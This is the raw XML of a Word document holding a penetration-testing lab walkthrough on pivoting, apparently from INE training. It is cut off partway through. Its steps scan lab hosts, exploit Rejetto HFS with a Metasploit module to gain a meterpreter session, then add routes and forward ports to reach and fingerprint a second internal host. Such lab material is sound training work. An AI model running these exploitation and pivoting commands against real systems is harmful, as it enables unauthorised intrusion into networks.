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BA76" w14:textId="6D3104BB" w:rsidR="00853ABF" w:rsidRDefault="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>Pivoting</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76676CCE" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRDefault="00172CA8"/>
    <w:p w14:paraId="375DA2B2" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E375EB5" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machines will be accessible at </w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo1.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo2.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3909A3" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> Exploit vulnerabilities in the target machines to gain access and retrieve a flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC501A" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRDefault="00172CA8"/>
    <w:p w14:paraId="7094C9A4" w14:textId="4D91AB2F" w:rsidR="00172CA8" w:rsidRDefault="00172CA8">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F94BA82" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRDefault="00172CA8"/>
    <w:p w14:paraId="052A9A01" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E62D4C1" w14:textId="7447FEC3" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78331DCF" wp14:editId="42D6C1D3">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="538468325" name="Picture 2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D963" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> Check if the target machines are reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D088CAB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2C0976EE" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>ping -c 4 demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02245724" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>ping -c 4 demo2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FA8EA" w14:textId="2E021F8F" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22816EFE" wp14:editId="3FAC320A">
            <wp:extent cx="5797848" cy="3587934"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14835096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9616" name="Picture 1483509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F2A1" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>The target machine demo1.ine.local is reachable, and demo2.ine.local is not reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBB7E6" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538AA8E0" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>To begin with, we will need to identify a vulnerable service running on the first target system, this can be done by performing a service version detection scan with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D8DAB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30B08900" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84A175" w14:textId="244ED3BA" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F1D3CBD" wp14:editId="0DCC3701">
            <wp:extent cx="5639090" cy="2927500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2036070636" name="Picture 30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0636" name="Picture 30" descr="A computer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9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0B41" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve">We have discovered that multiple ports are open. We will run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> again to determine version information on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274378EF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628324C4" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> -p80 demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C265907" w14:textId="299B8F46" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FD4482C" wp14:editId="630EA638">
            <wp:extent cx="5778797" cy="2159111"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1472320975" name="Picture 3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20975" name="Picture 31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5BFA" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> Searching for exploits with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14FF5805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22E07542" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>hfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17FF3CB8" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve">As shown in the following screenshot, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> reveals that there is a Metasploit Framework exploit module that can be used to exploit this specific version of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP File Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C92D38" w14:textId="3F8F83F7" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FC67970" wp14:editId="22D8CF94">
            <wp:extent cx="5867702" cy="3359323"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="720009777" name="Picture 3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09777" name="Picture 32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9709" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> Gaining access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26F801" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>To use this exploit module, we will need to start up the Metasploit Framework Console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>), this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B052000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5EA95E1D" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C6EA1" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>After starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>, we can load the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CE624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5295A9C6" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>use exploit/windows/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>rejetto_hfs_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="529F01B2" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>We will now need to configure the module options, more specifically, we will need to set the target address. This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910FD21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5BCBB14E" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>set RHOSTS demo1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305DE0C4" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>After configuring the module options, we can execute the exploit module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C849A78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2626AA36" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345CB16F" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:lastRenderedPageBreak/>
        <w:t>As shown in the following screenshot, the exploit module runs successfully and provides us with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t> session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630FC4AA" w14:textId="1A2C4BBC" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30622D16" wp14:editId="0B445C33">
            <wp:extent cx="5740695" cy="3213265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="12080135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13543" name="Picture 12080135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A9B0" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>We have successfully exploited the target vulnerable application (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>hfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve">) and received a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> shell. Check target machine IP Address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5492AF69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1A602D55" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7D5B7" w14:textId="37C24715" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332DD1F6" wp14:editId="79146094">
            <wp:extent cx="5524784" cy="4165814"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="544864669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64669" name="Picture 3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1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C465" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve">We can observe, there is only one network </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>adapter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> and we have two machine IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5111145B" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>But,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> we cannot access “demo2.ine.local” directly from the attacker’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746D3B5" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>We will add a route and then we will run an auxiliary port scanner module on the second victim machine to discover a host and open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133488C5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12A752FD" w14:textId="55FADE42" w:rsidR="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>run autoroute -s 10.4.22.0/20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFBBC56" w14:textId="60795ABC" w:rsidR="0034129C" w:rsidRPr="00172CA8" w:rsidRDefault="0034129C" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A9ABF98" wp14:editId="70C5F084">
            <wp:extent cx="5562886" cy="1270065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2145774482" name="Picture 3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74482" name="Picture 35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7E17" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>Running the port scanner on the second machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D0B73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1B4D257A" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:lastRenderedPageBreak/>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A385F8" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11577455" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>set RHOSTS demo2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63169075" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>set PORTS 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0BF74" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EADB502" w14:textId="239D300F" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="0034129C" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60496B77" wp14:editId="20D38B56">
            <wp:extent cx="5804198" cy="2267067"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1316296353" name="Picture 36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96353" name="Picture 36" descr="A screen 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198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EEE9" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>We have discovered port 80 on the pivot machine. Now, we will forward the remote port 80 to local port 1234 and grab the banner using Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB2AAD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5890F401" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEDBD4E" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> add -l 1234 -p 80 -r &lt;IP Address of demo2.ine.local&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84253C" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A956F13" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> You can use the ping utility from Step 2 to find the IP address of the demo2.ine.local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D3048C" w14:textId="288D7D3A" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="0034129C" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5709E825" wp14:editId="6C6022FB">
            <wp:extent cx="5524784" cy="2629035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35884260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42601" name="Picture 3588426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1DC3" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>We have forwarded the port, now use Nmap to find the running application name and version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1CB6CE" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> Do not close </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9DC510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119DFAEA" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> -p 1234 localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF9F79" w14:textId="4B5BB745" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="0034129C" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1892BBA5" wp14:editId="2C29A1B7">
            <wp:extent cx="5804198" cy="2184512"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="17173502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0235" name="Picture 17173502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198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D534" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve">The machine is running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>BadBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
